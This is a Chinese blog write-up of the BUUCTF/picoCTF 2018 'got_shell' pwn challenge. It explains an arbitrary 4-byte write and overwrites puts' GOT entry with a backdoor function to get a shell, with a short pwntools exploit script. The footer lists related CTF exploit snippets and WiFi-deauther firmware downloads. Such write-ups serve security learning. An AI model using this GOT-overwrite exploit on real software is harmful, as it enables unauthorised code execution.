[BUUCTF-pwn]——picoctf_2018_got_shell

最新推荐文章于 2023-09-29 18:26:46 发布
最新推荐文章于 2023-09-29 18:26:46 发布
阅读量466 收藏 2
点赞数 2
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114013273
版权
本文详细介绍了如何通过逻辑漏洞,利用.got表来实现远程代码执行。在32位程序中,发现存在后门函数win,但无栈溢出、格式化字符串漏洞和堆漏洞。通过输入地址控制.v3和.v4,将.v3指向puts函数的.got表地址,.v4指向win函数地址,使得puts调用时实际执行win函数,成功获取shell。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——picoctf_2018_got_shell

思路

程序中没有栈溢出,也没有格式化字符串漏洞和堆漏洞。
那么我们就可以考虑一下逻辑的漏洞
我们看到v3是一个指针,我们可以向里面写地址(%x是以十六进制读入),然后我们也可以向v4里面写入地址。并且我们可以看到*v3 = v4这个操作。意味着我们可以将我们第二次输入的地址,写入第一次输入的地址中。
是不是想到了什么。.got表

我们看到该语句下面还有puts函数执行,那么我们就可以将v3写成puts got表的地址,将v4写成win函数的地址。这样就可以在调用puts函数时,实际调用 win函数了

exploit

from pwn import *
p=remote('node3.buuoj.cn',25901)

elf=ELF('./PicoCTF_2018_got-shell ')
puts_got=elf.got['puts']
win_addr=0x0804854B

p.sendlineafter("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?", hex(puts_got))

p.recv()
p.sendline(hex(win_addr))

p.interactive()

原创不易,希望可以打赏支持一下。
感谢各位金主爸爸了 😉

Y-peak
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习】GOT劫持
Morphy_Amo的博客
12-15 4050
文章目录例题GOT劫持获取Syscallopen-read-write利用系统调用号调用open构造payload获取syscall读取flag文件exp 例题 例题:XCTF-008-Recho 查看安全策略 root@kali:~/ctf/xctf/pwn# checksec 008_Recho [*] '/root/ctf/xctf/pwn/008_Recho' Arch: amd64-64-little RELRO: Partial RELRO Stac
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 974
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF]PWN——picoctf_2018_got_shell
mcmuyanga的博客
01-22 360
picoctf_2018_got_shell 附件 步骤: 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,提示了两个地址 32位ida载入,检索字符串发现了后门,shell_addr=0x804854B main() 让我们将内容写入到我们选择的地址上。一开始想尝试溢出后来发现没有溢出漏洞 那么就根据程序的功能,将后门写入到puts@got上,这样在执行第16行的puts的时候我们就能获取shell了 完整exp from pwn import * r=remote('no
picoctf_2018_got_shell
qq_62887641的博客
09-29 248
32位,只开了NX有后门函数,并且主函数,是更改地址的程序。
picoctf_2018_echooo
doudoudedi
09-23 531
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 427
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4068
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
变量是什么_GOT劫持PWN
weixin_39628247的博客
12-08 544
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。上次介绍IO FILE的pwn题目时,提到exit函数中,会调用标准...
PWN-PRACTICE-BUUCTF-20
P1umH0的博客
09-07 176
PWN-PRACTICE-BUUCTF-20actf_2019_babystackpicoctf_2018_can_you_gets_mepicoctf_2018_got_shellmrctf2020_easy_equation actf_2019_babystack 两次栈迁移 # -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ACTF_2019_babystack") io=remote(
21 08 08学习总结
eeeeeight的博客
08-10 1130
21.08.08学习总结 Tags: learning experience 不知道什么时间-不知道什么时间: BUU刷题 re找门: xor: 一个数xor同一个数两次之后仍然是其本身 reverse3: 一个base64的加密, 主函数里有个+i的操作, 把+i消去之后base64解密就行了, 但是因为是萌新第一次接触re的base64, 于是就自己写了个base64的加密与解密练手(ida的ctrl e是直接选取字符串) helloword: jeb打开, 就能直接找到了 SimpleRev: 前面有
BUUCTF刷题5
m0_51251108的博客
10-30 558
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
BUUCTF pwn wp 76 - 80
fa1c4的blog
11-16 916
cmcc_pwnme2 picoctf_2018_got_shell actf_2019_babystack picoctf_2018_can_you_gets_me mrctf2020_easy_equation
BUUCTF-pwn(10)
njh18790816639的博客
01-08 351
picoctf_2018_shellcode 题目很很简单! from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './PicoCTF_2018_shellcode' r = remote('node4.buuoj.cn',25585) #r = process(binary) elf = ELF(binary) shellcode = asm(shellcraft.sh()) r.recvunti
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 248
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3947
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3092
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值